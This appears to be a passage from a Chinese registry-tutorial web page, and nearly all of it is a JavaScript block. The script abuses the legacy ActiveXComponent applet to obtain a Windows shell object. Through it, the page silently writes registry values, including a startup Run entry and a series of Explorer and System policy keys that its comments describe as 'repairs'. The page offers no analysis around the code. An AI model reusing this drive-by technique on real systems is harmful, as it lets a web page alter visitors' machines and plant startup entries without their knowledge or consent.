</head> <body> <script> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); function f( ) { a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\Run\\internat.exe", "C:\\WINDOWS\\SYSTEM\\internat.exe"); Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoFind","00000000", "REG_DWORD");
//修复查找按纽 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoRecentDocsMenu", "00000000",
"REG_DWORD"); //修复文档按纽 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\System\\NoDispCPL","00000000", "REG_DWORD");
//修复显示属性 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\System\\NoDispScrSavPage", "00000000",
"REG_DWORD"); //修复屏幕保护程序 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\System\\NoDispSettingsPage", "00000000",
"REG_DWORD"); //修复效果,web,设置 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\System\\NoDevMgrPage", "00000000", "REG_DWORD");
//修复设备管理器 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\System\\NoConfigPage", "00000000", "REG_DWORD");
//修复硬件配置文件 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\System\\NoVirtMemPage", "00000000", "REG_DWORD");
//虚拟内存 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\System\\NoFileSysPage", "00000000", "REG_DWORD");
//修复文件系统 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoDeletePrinter", "00000000",
"REG_DWORD"); //删除打印机 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoAddPrinter", "00000000", "REG_DWORD");
//添加打印机 Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\Policies\\Explorer\\NoViewContextMenu", 00, "REG_BINARY");
//使用鼠标右键
上一篇:摆脱可恶网站的阴影-注册表全攻略
下一篇:分析一个网站的恶意代码-注册表全攻略
|